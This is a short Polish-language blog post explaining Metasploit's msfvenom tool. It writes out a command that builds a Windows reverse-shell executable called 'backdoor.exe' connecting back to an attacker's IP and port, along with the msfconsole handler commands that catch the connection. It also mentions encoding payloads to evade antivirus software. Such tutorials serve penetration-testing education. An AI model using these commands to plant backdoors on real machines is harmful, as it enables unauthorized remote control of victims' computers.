Narzędzie msfvenom jest częścią pakietu Metasploit Framework i służy do generowania i kodowania ładunków(payloads) metasploita. Narzędzie to zastąpiło w dniu 8 czerwca 2015 narzędzia msfpayload oraz msfencode stając się ich następcą.
Początkowo miało tutaj znaleźć sie kilka informacji o narzędziu msfvenom wraz z opisem jednak wszystko co chciałem napisać znalazłem na podstronie How to use msfvenom wchodzącej w skład wiki projektu Metasploit Framework. Co prawda w chwili tworzenia tego wpisu na stronie wiki jest nieaktualna lista opcji programu ale aktualną listę zobaczymy wpisując msfvenom -h. Jednak sam opis wykorzystania jest jak najbardziej aktualny.
Dzięki temu narzędziu możemy przykładowo wygenerować plik wykonywalny który będzie nawiązywał połączenie zwrotne do zadanego adresu IP na zadanym porcie. Możemy próbować szyfrować różnymi sposobami nasz plik tak aby programy antywirusowe go nie rozpoznały. Możemy również używać szablonów tak aby podpiąć nasz ładunek do istniejącego pliku wykonywalnego.
Przykład.
Generujemy plik wykonywalny który będzie się łączył z naszą stacją:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.11 LPORT=4444 -f exe -o /home/user/backdoor.exe
Jak widzimy wykorzystano ładunek windows/shell_reverse_tcp oraz ustawiono parametry tak, aby po odpalaniu plik łączył się z adresem atakującego czyli 192.168.0.11 na porcie 4444. Jako format wyjściowy wybrano plik wykonywalny exe. Plik zostanie zapisany w lokalizacji /home/user/backdoor.exe.
Atakujący odpala u siebie msfconsole i zaczyna nasłuchiwać :
use exploit/multi/handler set PAYLOAD windows/shell_reverse_tcp set LHOST 192.168.0.11 set LPORT 4444 run
Teraz jeżeli ofiara odpali plik backdoor.exe to zostanie nawiązane połączenie i uzyskamy dostęp do stacji ofiary. Oczywiście przy założeniu, że plik lub ruch sieciowy nie zostaną zablokowane przez oprogramowanie chroniące stację.
Brak komentarzy:
Prześlij komentarz